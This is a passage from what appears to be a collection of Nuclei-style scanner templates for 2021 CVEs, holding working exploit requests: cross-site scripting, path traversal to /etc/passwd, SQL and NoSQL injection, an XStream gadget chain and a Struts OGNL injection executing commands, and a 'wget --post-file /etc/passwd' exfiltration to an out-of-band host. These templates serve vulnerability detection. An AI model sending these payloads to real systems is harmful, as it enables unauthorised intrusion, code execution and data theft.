{{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=easy-facebook-likebox&access_token=a&type=</script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'type' : '</script><script>alert(document.domain)</script>'"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21315","info":{"name":"Node.JS System Information Library <5.3.1 - Remote Command Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20{{interactsh-url}})"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["wget --post-file /etc/passwd {{interactsh-url}}","name","running","pids"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24335","info":{"name":"WordPress Car Repair Services & Auto Mechanic Theme <4.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/themes/car-repair-services/css","/wp-content/themes/car-repair-services/js","id=\"car-repair-services-"],"condition":"or"}]},{"method":"GET","path":["{{BaseURL}}/car1/estimateresult/result?s=&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40875","info":{"name":"Gurock TestRail Application files.md5 Exposure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/files.md5","{{BaseURL}}/testrail/files.md5"],"stop-at-first-match":true,"max-size":1000,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["app/arguments/admin"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25008","info":{"name":"The Code Snippets WordPress Plugin < 2.14.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=snippets&snippets-safe-mode%5B0%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\" style=animation-name:rotation onanimationstart=alert(document.domain) x","Snippets"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29484","info":{"name":"Ghost CMS <=4.32 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ghost/preview"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["XMLHttpRequest.prototype.open = XMLHttpRequest.prototype.send","top.postMessage("],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39316","info":{"name":"WordPress DZS Zoomsounds <=6.50 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24300","info":{"name":"WordPress WooCommerce <1.13.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword=\"onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\\\"onmouseover=alert(document.domain);//\">","PickPlugins Product Slider"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21985","info":{"name":"VMware vSphere Client (HTML5) - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"methodInput\":[{\"type\":\"ClusterComputeResource\",\"value\": null,\"serverGuid\": null}]}\n"],"matchers":[{"type":"word","part":"body","words":["{\"result\":{\"isDisconnected\":"]}]}]},{"id":"CVE-2021-44152","info":{"name":"Reprise License Manager 14.2 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/goforms/menu"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["RLM Administration Commands"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25055","info":{"name":"WordPress FeedWordPress < 2022.0123 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D1+onerror%3Dalert%28document.domain%29%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=1 onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21745","info":{"name":"ZTE MF971R - Referer authentication bypass","severity":"medium"},"requests":[{"raw":["GET /goform/goform_get_cmd_process?cmd=psw_fail_num_str HTTP/1.1\nHost: {{Hostname}}\nReferer: http://interact.sh/127.0.0.1.html\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["psw_fail_num_str\":\"[0-9]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29203","info":{"name":"HPE Edgeline Infrastructure Manager <1.22 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"Password\":\"{{randstr}}\"}\n","POST /redfish/v1/SessionService/Sessions/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"UserName\":\"Administrator\",\"Password\":\"{{randstr}}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["X-Auth-Token","PasswordReset","Location"],"condition":"and"},{"type":"word","part":"body","words":["Base.1.0.Created"]},{"type":"status","status":[201]}]}]},{"id":"CVE-2021-22145","info":{"name":"Elasticsearch 7.10.0-7.13.3 - Information Disclosure","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/_bulk"],"body":"@\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["root_cause","truncated","reason"],"condition":"and"},{"type":"status","status":[400]}]}]},{"id":"CVE-2021-28169","info":{"name":"Eclipse Jetty ConcatServlet - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/static?/%2557EB-INF/web.xml","{{BaseURL}}/concat?/%2557EB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/xml"]},{"type":"word","part":"body","words":["</web-app>","java.sun.com"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24991","info":{"name":"WooCommerce PDF Invoices & Packing Slips WordPress Plugin < 2.10.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=wpo_wcpdf_options_page&section=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\" style=animation-name:rotation onanimationstart=alert(document.domain) x","WooCommerce PDF Invoices"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31856","info":{"name":"Layer5 Meshery 0.5.2 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/experimental/patternfile?order=id%3Bselect(md5({{num}}))&page=0&page_size=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3293","info":{"name":"emlog 5.3.1 Path Disclosure","severity":"medium"},"requests":[{"raw":["GET /t/index.php?action[]=aaaa HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<b>Warning</b>","on line","expects parameter"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20137","info":{"name":"Gryphon Tower - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/luci/site_access/?url=%22%20onfocus=alert(document.domain)%20autofocus=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["onfocus=alert(document.domain) autofocus=1>","Send Access Request URL"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27320","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nPOST /contactus.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&lastname={{randstr}}&email={{randstr}}%40test.com&comment={{randstr}}&submit=Send+Us\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"Medical Management System\")"],"condition":"and"}]}]},{"id":"CVE-2021-22707","info":{"name":"EVlink City < R8 V3.4.0.1 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/cgiServer?worker=IndexNew HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nCookie: CURLTOKEN=b35fcdc1ea1221e6dd126e172a0131c5a; SESSIONID=admin\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","words":["?worker=Cluster\" name=\"cluster\" id=\"id_cluster"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39144","info":{"name":"XStream 1.4.18  - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<java.util.PriorityQueue serialization='custom'>\n  <unserializable-parents/>\n  <java.util.PriorityQueue>\n    <default>\n      <size>2</size>\n    </default>\n    <int>3</int>\n    <dynamic-proxy>\n      <interface>java.lang.Comparable</interface>\n      <handler class='sun.tracing.NullProvider'>\n        <active>true</active>\n        <providerType>java.lang.Comparable</providerType>\n        <probes>\n          <entry>\n            <method>\n              <class>java.lang.Comparable</class>\n              <name>compareTo</name>\n              <parameter-types>\n                <class>java.lang.Object</class>\n              </parameter-types>\n            </method>\n            <sun.tracing.dtrace.DTraceProbe>\n              <proxy class='java.lang.Runtime'/>\n              <implementing__method>\n                <class>java.lang.Runtime</class>\n                <name>exec</name>\n                <parameter-types>\n                  <class>java.lang.String</class>\n                </parameter-types>\n              </implementing__method>\n            </sun.tracing.dtrace.DTraceProbe>\n          </entry>\n        </probes>\n      </handler>\n    </dynamic-proxy>\n    <string>curl http://{{interactsh-url}}</string>\n  </java.util.PriorityQueue>\n</java.util.PriorityQueue>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2021-45043","info":{"name":"HD-Network Realtime Monitoring System 2.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /language/lang HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\nCookie: s_asptitle=HD-Network%20Real-time%20Monitoring%20System%20V2.0; s_Language=../../../../../../../../../../../../../../etc/passwd; s_browsertype=2; s_ip=; s_port=; s_channum=; s_loginhandle=; s_httpport=; s_sn=; s_type=; s_devtype=\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31805","info":{"name":"Apache Struts2 S2-062 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF\nContent-Length: 1095\n\n------WebKitFormBoundaryl7d1B1aGsV2wcZwF\nContent-Disposition: form-data; name=\"id\"\n\n%{\n(#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +\n(#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +\n(#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n(#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +\n(#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\n(#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\n(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'cat /etc/passwd'}))\n}\n\n------WebKitFormBoundaryl7d1B1aGsV2wcZwF\u2014\n"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-35488","info":{"name":"Thruk 2.40-2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/thruk/cgi-bin/login.cgi?thruk/cgi-bin/status.cgi%3fstyle=combined&title=%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["'></script><script>alert(document.domain)</script>","Thruk Monitoring"],"condition":"and"},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-43421","info":{"name":"Studio-42 elFinder <2.1.60 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name={{randstr}}.php:aaa HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /elFinder/php/connector.minimal.php?cmd=put&target={{hash}}&content={{randstr_1}} HTTP/1.1\nHost: {{Hostname}}\n","GET /elfinder/files/{{randstr}}.php%3Aaaa?_t= HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers":[{"type":"dsl","dsl":["contains(body_3, \"{{randstr_1}}\")","status_code == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"hash","group":1,"regex":["\"hash\"\\:\"(.*?)\"\\,"],"internal":true}]}]},{"id":"CVE-2021-25016","info":{"name":"Chaty < 2.8.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=chaty-contact-form-feed&search=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["search=</script><img src onerror=alert(document.domain)>","chaty_page_chaty"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25864","info":{"name":"Hue Magic 3.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-30134","info":{"name":"Php-mod/curl Library <2.3.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php?key=<img%20src%20onerror%3dalert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","words":["key\":\"<img src onerror=alert(document.domain)>\""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42566","info":{"name":"myfactory FMS  -  Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25104","info":{"name":"WordPress Ocean Extra <1.9.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/?step=demo&page=owp_setup&a\"><script>alert(/XSS/)</script>   HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["OceanWP","><script>alert(/XSS/)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24347","info":{"name":"WordPress SP Project & Document Manager <4.22 - Authenticated Shell Upload","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=sp-client-document-manager-fileview HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryaeBrxrKJzAF0Tgfy\n\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"cdm_upload_file_field\"\n\n{{nonce}}\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"_wp_http_referer\"\n\n/wordpress/wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"dlg-upload-name\"\n\n\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"dlg-upload-file[]\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"dlg-upload-file[]\"; filename=\"{{randstr}}.pHP\"\nContent-Type: image/svg+xml\n\n<?php\n\necho \"CVE-2021-24347\";\n\n?>\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"dlg-upload-notes\"\n\n\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"sp-cdm-community-upload\"\n\nUpload\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy--\n","GET /wp-content/uploads/sp-client-document-manager/1/{{to_lower(\"{{randstr}}.pHP\")}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_4, \"text/html\")","status_code_4 == 200","contains(body_4, \"CVE-2021-24347\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"cdm_upload_file_field\" value=\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2021-32682","info":{"name":"elFinder 2.1.58 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/elfinder/elfinder-cke.html","{{BaseURL}}/assets/backend/elfinder/elfinder-cke.html","{{BaseURL}}/assets/elFinder-2.1.9/elfinder.html","{{BaseURL}}/assets/elFinder/elfinder.html","{{BaseURL}}/backend/elfinder/elfinder-cke.html","{{BaseURL}}/elfinder/elfinder-cke.html","{{BaseURL}}/uploads/assets/backend/elfinder/elfinder-cke.html","{{BaseURL}}/uploads/assets/backend/elfinder/elfinder.html","{{BaseURL}}/uploads/elfinder/elfinder-cke.html"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["elfinder","php/connector"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20792","info":{"name":"WordPress Quiz and Survey Master <7.1.14 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=mlw_quiz_list&s=\"></script><script>alert(document.domain)</script>&paged=\"></script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3002","info":{"name":"Seo Panel 4.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /seo/seopanel/login.php?sec=forgot HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsec=requestpass&email=test%40test.com%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3e11&code=AAAAA&login=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["<img src=a onerror=alert(document.domain)>","seopanel"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31195","info":{"name":"Microsoft Exchange Server - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\\&refurl=}}};alert(document.domain)//"],"matchers-condition":"and","matchers":[{"type":"word","words":["alert(document.domain)//&et=ServerError","mail/bootr.ashx"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-46069","info":{"name":"Vehicle Service Management System 1.0 - Stored Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Master.php?f=save_mechanic HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=&name=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&contact=asd1&email=asd1@asd.com&status=1\n","GET /admin/?page=mechanics HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"<td>\\\"><script>alert(document.domain)</script></td>\")"],"condition":"and"}]}]},{"id":"CVE-2021-1498","info":{"name":"Cisco HyperFlex HX Data Platform - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /storfs-asup HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\naction=&token=`wget http://{{interactsh-url}}`&mode=`wget http://{{interactsh-url}}`\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20090","info":{"name":"Buffalo WSR-2533DHPL2 - Path Traversal","severity":"critical"},"requests":[{"raw":["GET /images/..%2finfo.html HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/info.html\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["URLToken(cgi_path)","pppoe","wan"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21803","info":{"name":"Advantech R-SeeNet - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/device_graph_page.php?is2sim=%22zlo%20onerror=alert(1)%20%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"zlo onerror=alert(1) \"","Device Status Graph"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-38147","info":{"name":"Wipro Holmes Orchestrator 20.4.1 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/processexecution/DownloadExcelFile/Domain_Credential_Report_Excel","{{BaseURL}}/processexecution/DownloadExcelFile/Process_Report_Excel","{{BaseURL}}/processexecution/DownloadExcelFile/Infrastructure_Report_Excel","{{BaseURL}}/processexecution/DownloadExcelFile/Resolver_Report_Excel"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains_all(header, 'application/vnd.openxml', 'attachment; filename=')","contains(body, '<?xml version=')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2021-21972","info":{"name":"VMware vSphere Client (HTML5) - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ui/vropspluginui/rest/services/getstatus"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["VSPHERE-UI-JSESSIONID"],"condition":"and"},{"type":"regex","part":"body","regex":["(Install|Config) Final Progress"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24472","info":{"name":"Onair2 < 3.9.9.2 & KenthaRadio < 2.0.2 - Remote File Inclusion/Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp1/home-18/?qtproxycall=https://oast.me"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24214","info":{"name":"WordPress OpenID Connect Generic Client 3.8.0-3.8.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/daggerhart-openid-connect-generic/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["OpenID Connect Generic Client"]}]},{"method":"GET","path":["{{BaseURL}}/wp-login.php?login-error=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ERROR (<script>alert(document.domain)</script>):","Login with OpenID Connect"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33044","info":{"name":"Dahua IPC/VTH/VTO - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /RPC2_Login HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nConnection: close\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\n{\"id\": 1, \"method\": \"global.login\", \"params\": {\"authorityType\": \"Default\", \"clientType\": \"NetKeyboard\", \"loginType\": \"Direct\", \"password\": \"Not Used\", \"passwordType\": \"Default\", \"userName\": \"admin\"}, \"session\": 0}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"result\":true,\"session\"","id","params"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[",\"result\":true,\"session\":\"([a-z]+)\"\\}"],"part":"body"}]}]},{"id":"CVE-2021-22911","info":{"name":"Rocket.Chat <=3.13 - NoSQL Injection","severity":"critical"},"requests":[{"raw":["POST /api/v1/method.callAnon/getPasswordPolicy HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"message\": \"{\\\"msg\\\":\\\"method\\\", \\\"method\\\": \\\"getPasswordPolicy\\\", \\\"params\\\": [{\\\"token\\\": {\\\"$regex\\\": \\\"^{{randstr}}\\\"}}] }\"}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[error-invalid-user]","\"success\":true"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46073","info":{"name":"Vehicle Service Management System 1.0 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST 